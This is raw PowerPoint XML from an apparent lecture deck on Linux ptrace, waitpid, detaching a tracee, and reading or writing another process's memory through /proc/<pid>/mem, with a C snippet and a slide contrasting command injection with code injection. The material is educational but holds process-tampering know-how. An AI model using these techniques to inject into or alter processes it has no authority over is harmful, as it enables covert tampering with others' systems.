              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGSTOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is sent, resulting in the process pausing its execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When a Tracee will Stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux manual page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425480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This attack differs from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="wikilink"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, in that code injection allows the attacker to add their own code that is then executed by the application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command Injection, the attacker extends the default functionality of the application, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system commands, without the necessity of injecting code.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>vs Code Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38616664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27584" y="2636912"/>
            <a:ext cx="7632848" cy="3096344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tracer will be notified at its next call to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waitpid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (or one of the related "wait" system calls); that call will return a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> value containing information that indicates the cause of the stop in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When a Tracer will be Notified        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21553483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99591" y="2675467"/>
            <a:ext cx="7776865" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>While the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is stopped, the tracer can use various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dirty="0"/>
              <a:t> requests to inspect and modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tracer then causes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to continue, optionally ignoring the delivered signal (or even delivering a different signal instead</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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Inspect and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Mofidy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> a Tracee           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2456021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When the tracer is finished tracing, it can cause the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to continue executing in a normal, untraced mode via </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PTRACE_DETACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Stop Tracing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual page</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21892850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5496" y="2492896"/>
            <a:ext cx="9036496" cy="3888432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Suspends the calling process until a child process ends or is stopped. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>precisely,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a:t>suspends the calling process until the system gets status information on the child. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the system already has status information on an appropriate child when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smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>called,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returns immediately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>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smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>also ended if the calling process receives a signal whose action is either to execute a signal handler or to end the process.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>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 Wait for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Specific Child </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>rocess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>End </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>IBM</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30770882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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process Completion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>GNU</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29632642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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>no standard, cross-platform debugging API for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-like systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>have a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system call, though each works a little differently. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>that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t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>not part of POSIX, but appeared in System V Release 4 (SVr4) and BSD, then copied elsewhere. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>following will all be specific to Linux, though the procedure is similar on other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Unix-likes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to Read and Write Other Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11543061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In typical Linux fashion, if it involves other processes, you use the standard file API on the </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proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>process has a directory under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>as its process ID. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>this directory is a virtual file called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>”, which is a file view of that process’ entire address space, including unmapped regions.</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File View </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Entire Address Space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42806698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char file[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0"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sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(file, "/proc/%</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ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mem", (long)</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0"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 = open(file, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The catch is that while you can open this file, you can’t actually read or write on that file without attaching to the process as a debugger. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You’ll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>just get EIO errors. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>attach, use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with </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PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. This asynchronously delivers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGSTOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> signal </a:t>
            </a:r>
            <a:r>
